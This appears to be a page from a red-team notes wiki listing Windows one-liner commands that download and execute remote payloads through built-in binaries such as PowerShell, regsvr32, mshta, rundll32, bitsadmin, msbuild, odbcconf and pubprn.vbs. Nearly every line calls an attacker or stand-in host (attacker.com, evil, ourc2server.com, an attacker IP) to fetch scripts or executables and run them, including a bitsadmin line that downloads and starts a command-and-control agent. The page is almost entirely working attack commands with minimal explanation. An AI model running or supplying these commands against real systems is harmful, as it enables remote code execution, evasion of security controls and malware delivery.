One Liners

Powershell:

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://attacker.com/payload.txt')|iex"

WMI:

wmic os get /format:https://evil/payload.xsl”

Regsvr32:

regsvr32 /u /n /s /i:http://evil/payload.sct scrobj.dll

regsvr32.exe /s /n /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
Execute the specified remote .SCT script with scrobj.dll

regsvr32.exe /s /u /i:file.sct scrobj.dll
Execute the specified local .SCT script with scrobj.dll.

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

MSHTA

mshta vbscript:Execute(“GetObject(“”scirpt:Http://evil/file.sct””)”)
mshta.exe http://<ip>/payload.hta
mshta.exe https://malicious.domain/runme.hta

Cscript:

 cscript //E:jscript \\webdav\payload.txt

BITSADMIN:

cmd.exe c "bitsadmin transfer myjob download priority high http://ourc2server.com/download/c2agent.exe c:\agent.exe&start agent.exe"
bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe

MSbuild:

msbuild.exe //ip/malicious_code.csproj
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

RunDll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://attacker.com/payload.txt");window.close();
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"
rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

obcdconf(dll renamed to txt)

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

pubprn.vbs

cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://192.168.2.71/tools/mitre/proxy-script/proxy.sct

PreviousCool ways of Calling a Process NextInitial Access

Last updated 4 years ago

Was this helpful?